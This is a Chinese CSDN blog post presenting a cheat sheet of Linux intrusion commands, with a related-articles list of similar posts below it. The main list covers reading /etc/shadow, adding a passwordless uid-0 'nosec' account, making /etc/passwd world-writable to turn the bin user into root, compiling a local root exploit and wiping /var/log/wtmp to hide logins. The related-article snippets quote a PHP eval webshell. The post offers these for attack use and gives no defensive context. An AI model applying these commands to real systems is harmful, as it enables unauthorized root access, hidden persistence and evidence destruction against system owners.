Linux 入侵常用命令汇编

最新推荐文章于 2023-04-07 17:15:00 发布
最新推荐文章于 2023-04-07 17:15:00 发布
阅读量190 收藏 2
点赞数 1
分类专栏: linux 文章标签: 入侵
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32352565/article/details/90612549
版权

       cat /etc/passwd 查看linux用户 

  cat /etc/shadow 查看用户密码需要root权限 

  cat /etc/sysconfig/network-scripts/ifcfg-ethn N代表网卡号 查看所在网卡的ip信息 

  ifconfig 查看本机ip信息 

  cat /etc/resolv.conf 查看DNS信息 

  bash -i 在反弹的shell中使用可以直观显示命令 

  bash prompt: 当你以普通限权用户身份进入的时候,一般你会有一个类似bash$的prompt。当你以Root登陆时,你的prompt会变成 

  bash#。 

  系统变量 : 试着echo "$USER / $EUID" 系统应该会告诉你它认为你是什么用户。 

  echo 1>/proc/sys/net/ipv4/if_forward是不是你写错了,应该是echo 1>/proc/sys/net/ipv4/ip_forward, 

  vim /proc/sys/net/ipv4/ip_forward 吧,默认是0,也就是内核不进行数据包过滤,改为1 ,让内核对数据包进行filter处理! 

  netstat -an |grep LISTEN |grep :80 查看端口 

  service --status-all | grep running 

  service --status-all | grep http 

  查看运行服务 

  lsb_release -a 查看系统版本 

  重启ssh服务 :/usr/sbin/sshd stop 

  /usr/sbin/sshd start 

  ssd_config文件里 

  PasswordAuthentication no, 

  将其改为 

  PasswordAuthentication yes 

  远程ssh才可登录 

  否则显示Access denied 

  其中Usepam yes可能用来建立pam方式login,比如从其它linux主机ssh到服务端,如果关闭,则不能打开. 

  su的菜鸟用法 

  先chomod 777 /etc/passwd 

  然后修改bin用户的gid和uid为0 

  然后passwd设置bin的密码 

  然后cp /bin/bash /sbin/nologin 

  然后su的时候su - bin就可以到rootshell了。 

  这个原理就是当ssh不允许root用ssh终端登陆的时候,我们又不知道root密码,的一种很菜鸟的做法 

  还可以这样 

  sed -i s/bin:x:1:1/bin:x:0:1/g /etc/passwd 

  gcc prtcl2.c –o local –static –Wall 

  echo "nosec:x:0:0::/:/bin/sh" >> /etc/passwd 

  echo "nosec::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow 

  清空last记录 cp /dev/null /var/log/wtmp 

  ----- 

  dd if=/dev/zero of=yourfile bs=10M count=10 建立一个100m的大文件在利用Linux Kernel <= 2.6.17.4 (proc) Local Root Exploit提权的时候要用到的。

qq_489366879
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
常用linux网络相关命令使用和输出详解
tge7618291的专栏
05-21 1万+
2)  网卡驱动程序所在目录 /lib/modules/2.6.29.4-167.fc11.i686.PAE/kernel/drivers/net 3)  查看网卡信息命令 ethtool eth0 (^ 查看网卡信息 ^) dmesg | grep -i eth (^ 查看网卡信息 ^) 1 tcpdump http://anheng.com.cn/news/24/586
linux病毒木马分析,Linux平台“盖茨木马”分析
weixin_42557803的博客
05-14 1262
最近对Linux.BackDoor.Gates.6的一个病毒样本进行了分析,通过调查发现Linux盖茨木马是一类有着丰富历史,隐藏手法巧妙,网络攻击行为显著的DDoS木马。这篇文章主要介绍了Linux盖茨木马的分析过程,同时会讲解在Linux环境下恶意软件分析的常用技巧和安全工具的使用方法。盖茨木马整体情况此类Linux木马主要恶意特点是具备了后门程序,DDoS攻击的能力,并且会替换常用的系统文件...
linux入侵常用命令总结
taizhoufox的专栏
07-30 508
感谢原作者: http://www.hackdos.com/Article/1/13/html/8531.html    cat /etc/passwd 查看linux用户  cat /etc/shadow 查看用户密码需要root权限  cat /etc/sysconfig/network-scripts/ifcfg-ethn N代表网卡号 查看所在网卡的ip信息  ifco
Linux***检查实用指令 --转
weixin_33862188的博客
02-12 162
倒腾了半天,在网上找到一个觉得不错的资料,分享,不过不知出处,作者莫怪 ---------------------------------------------------------------------------------------- Linux***检查实用指令 1 可以得出filename正在运行的进程 #pidof filename 2 ...
黑客常用 Linux 入侵常用命令
热门推荐
杨春建的博客
02-10 1万+
原文地址:http://blog.csdn.net/jHstGeWWubw/article/details/78941387写个php一句话后门上去:[jobcruit@wa64-054 rankup_log]$ echo -e "&lt;?php @eval(\$_POST[md5])?&gt;" &gt;rankuplog_time.php[jobcruit@wa64-054 rankup_l...
Linux系统下基本命令(要区分大小写)
weixin_33834910的博客
09-03 4347
系统 # uname -a # 查看内核/操作系统/CPU信息 # head -n 1 /etc/issue # 查看操作系统版本 # cat /proc/cpuinfo # 查看CPU信息 # hostname # 查看计算机名 # env # 查看环境变量 # dmidecode #查看硬件详细信息资源 # free -m # 查...
linux攻击服务器命令大全,linux服务器常用命令大全
weixin_39551366的博客
05-09 259
linux服务器常用命令介绍,以及运用。1.查看系统时间和日期的命令: date2.修改系统时间和日期命令: date 月日时分年3.只修改时间命令 :date –s4.清屏命令: clear5.查看主机名命令: hostname6.查看IP地址命令,包括子网掩码,广播地址,网卡的物理地址: ifconfig7.测试连通命令: ping8.强行中断快捷键: ctrl+c9.重启命令: reboo...
linux 入侵常用命令汇编
09-16
Linux 入侵常用命令汇编 本资源汇编Linux 入侵中常用的命令,掌握这些命令可以帮助配置 Linux 的安全。以下是详细的知识点: 一、查看系统信息 * `cat /etc/passwd` 查看 Linux 用户信息 * `cat /etc/shadow` ...
Linux 从bin解析NXDOMAIN,[转]Linux操作系统tcpdump抓包分析详解
weixin_36165049的博客
05-15 2044
PS:tcpdump是一个用于截取网络分组,并输出分组内容的工具,简单说就是数据包抓包工具。tcpdump凭借强大的功能和灵活的截取策略,使其成为Linux系统下用于网络分析和问题排查的首选工具。tcpdump提供了源代码,公开了接口,因此具备很强的可扩展性,对于网络维护和入侵者都是非常有用的工具。tcpdump存在于基本的Linux系统中,由于它需要将网络界面设置为混杂模式,普通用户不能正常执行...
linux入侵网站,linux入侵的基本命令
weixin_35662528的博客
05-15 388
Linux系统下基本命令: 要区分大小写系统# uname -a # 查看内核/操作系统/CPU信息# head -n 1 /etc/issue # 查看操作系统版本# cat /proc/cpuinfo # 查看CPU信息# hostname # 查看计算机名# env # 查看环境变量# dmidecode #查看硬件详细信息资源# free -m # 查看内存使用量和交换区使用量# df -...
超全的 Linux 机器的渗透测试命令备忘表 原创 2018-01-19 OSC - 协作翻译 开源中国 协作翻译 原文:Most Important Penetration Testing co
鲍鱼哥的博客
01-19 748
超全的 Linux 机器的渗透测试命令备忘表原文:Most Important Penetration Testing commands Cheat Sheet for Linux Machine链接:https://techincidents.com/important-penetration-testing-cheat-sheet/如下是一份 Linux 机器的渗透测试备忘录,是在后期开发期间
黑客再爆Linux内核高危漏洞,一个命令可以攻击所有Linux系统
weixin_34217773的博客
08-17 269
在微软本月月经日(8.11)的同一天,国外黑客taviso和julien公开了可以攻击所有新旧Linux系统的一个漏洞,包括但不限于RedHat,CentOS,Suse,Debian,Ubuntu,Slackware,Mandriva,Gentoo及其衍生系统。黑客只需要执行一个命令,就可以通过此漏洞获得root权限,即使开启了SELinux也于事无补。攻击这个漏洞到底有多简单,下面我们看图说...
检查linux入侵的命令
建伟博客
04-23 881
1、检查最近有谁登陆过linux系统 可以在命令窗口输入 last 或则 last -i   可以查看分别有那些IP地址登陆   2、检查都有过那些操作 history
Linux系统基本命令(入侵
鬼惊天
01-31 371
系统信息 arch 显示机器的处理器架构 uname -m 显示机器的处理器架构 uname -r 显示正在使用的内核版本 dmidecode -q 显示硬件系统部件 - (SMBIOS / DMI) hdparm -i /dev/hda 罗列一个磁盘的架构特性 hdparm -tT /dev/sda 在磁盘上执行测试性读取操作 cat /proc/cpuinfo 显示CPU info的信息 ca...
入侵Linux服务器常用命令
跟派大星学编程
02-28 1184
写个php一句话后门上去: $ echo -e "&lt;?php @eval($_POST[md5])?&gt;" &gt;rankuplog_time.php ​$ cat rankuplog_time.php 1.linux的想着先跨站。 shell浏览目标站不行,命令行下输入 ls -la /www.users/ 2.溢出提权 # python –c ‘impotr pty;pty.s...
【黑客】常用linux入侵常用命令,有你不知道的没?
最新发布
分享Python知识
04-07 745
写个php一句话后门上去:shell浏览目标站不行,命令行下输入ls -la /www.users/来得到交互的Shell,一般的系统都默认安装python输入idbash-3.2$这里uid=529(zeicom)还不是root权限,输入uname –r返回:2.6.18-164.11.1.el5PAELinux提权大致可分为,第三方软件漏洞、本地信任特性、内核溢出找对应的exp, 这里地址整理很齐全可以这里下命令输入pwd,这个命令是显示当前目录,先看能不能编译 gcc -help。
Linux 下的网络攻击
xk的博客
03-06 1万+
学习了虚拟机的linux系统,想玩点有意思的,没错就是攻击,给大家教一个简单的arpspoof攻击这种攻击会将对方电脑卡的掉线,注意这种操作是在同一局域网下的操作。接下来说一说具体的步骤第一步 安装 sudo apt-get install dsniff ssldump,看不懂不要紧,这个命令就是为了能启动arpspoof 方便arpspoof攻击第二步 要知道 ip 和 默认网关  在这里我先以...
linux网络入侵命令,如何使用netstat命令验证DDOS入侵
weixin_42407741的博客
05-10 147
一般来说,服务器非常慢可能原因是多方面的,有可能是配置错误,脚本错误或者是一些奇诡的硬件。当然也有可能是有人对你的服务器进行 Dos (拒绝服务攻击)或者 DDOS (分布式拒绝服务攻击)。Dos攻击或者DDos攻击目的是使服务器或者网络资源耗尽,使其他用户无法使用。一般来说,这种攻击主要针对重要的网站或服务,比如银行、信用卡支付网关甚至是根域名服务器。Dos攻击主要通过强制目标主机重启或大量消耗...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值